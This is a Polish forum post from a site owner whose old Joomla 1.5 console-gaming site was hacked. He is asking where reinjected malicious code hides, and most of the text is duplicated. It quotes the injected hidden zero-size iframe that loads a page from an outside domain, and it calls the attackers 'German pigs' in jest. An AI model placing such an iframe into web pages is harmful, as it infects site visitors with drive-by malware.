grzybiarz
01-03-2013, 15:45
Ech... stało się. Moja strona na starej Joomli 1.5 została hacknięta. Google informuje że "Ta witryna może wyrządzić szkody na Twoim komputerze."...
Proszę nie krzyczeć że 1.5, chciałbym przejść na nowszą, ale mam dodatki które działają na 1.5, szablon itd no i teraz mam... Nie dość że męczę się od 2011, tyle godzin spędziłem, tyle kasy władowałem to i akurat mnie zhackowali jakieś niemieckie świnie:)
W szablonie strony widzę wpis z niewidzialną ramką
<iframe src="http://ccp-worldwide-helps.com/loc/info.php" width="0" height="0" frameborder="0"></iframe>, co dziwne bo tylko tam. Skasowałem i dalej się pojawiło za jakiś czas. Pobrałem zawartość strony na dysk, przeskanowałem te chyba 20 000 plików w poszukiwaniu ww. adresu i tylko jeden wynik w indexie z szablonem. W panelu php admina również nic nie znajduje. Mimo to google podaje linki w których wklejono złośliwy kod:
[spoiler]
Ok, niby w tych plikach jest kod, ale jak przeglądam pliki artykułów z ww. listy, to nic tam nie ma. Natomiast gdy wejdę w źródło strony, widać złośliwy kod.
To gdzie on jest?:(
Mam też backup ale jakiś stary, a i nie wiem czy wszystko się naprawi, skoro nie wiadomo gdzie to siedzi.
Coraz częściej myślę o migracji na 3.0 albo chociaż 2.5, ale to znowu czas i zapewne pieniadze, a strona jest o moim hobby jakim jest granie na konsolach i taki cyrk. Mam 17 zarejestrowanych osób, taka bieda i akurat komuś się nie spodobała stronka :(.
Proszę nie krzyczeć że 1.5, chciałbym przejść na nowszą, ale mam dodatki które działają na 1.5, szablon itd no i teraz mam... Nie dość że męczę się od 2011, tyle godzin spędziłem, tyle kasy władowałem to i akurat mnie zhackowali jakieś niemieckie świnie:)
W szablonie strony widzę wpis z niewidzialną ramką
<iframe src="http://ccp-worldwide-helps.com/loc/info.php" width="0" height="0" frameborder="0"></iframe>, co dziwne bo tylko tam. Skasowałem i dalej się pojawiło za jakiś czas. Pobrałem zawartość strony na dysk, przeskanowałem te chyba 20 000 plików w poszukiwaniu ww. adresu i tylko jeden wynik w indexie z szablonem. W panelu php admina również nic nie znajduje. Mimo to google podaje linki w których wklejono złośliwy kod:
[spoiler]
Ok, niby w tych plikach jest kod, ale jak przeglądam pliki artykułów z ww. listy, to nic tam nie ma. Natomiast gdy wejdę w źródło strony, widać złośliwy kod.
To gdzie on jest?:(
Mam też backup ale jakiś stary, a i nie wiem czy wszystko się naprawi, skoro nie wiadomo gdzie to siedzi.
Coraz częściej myślę o migracji na 3.0 albo chociaż 2.5, ale to znowu czas i zapewne pieniadze, a strona jest o moim hobby jakim jest granie na konsolach i taki cyrk. Mam 17 zarejestrowanych osób, taka bieda i akurat komuś się nie spodobała stronka :(.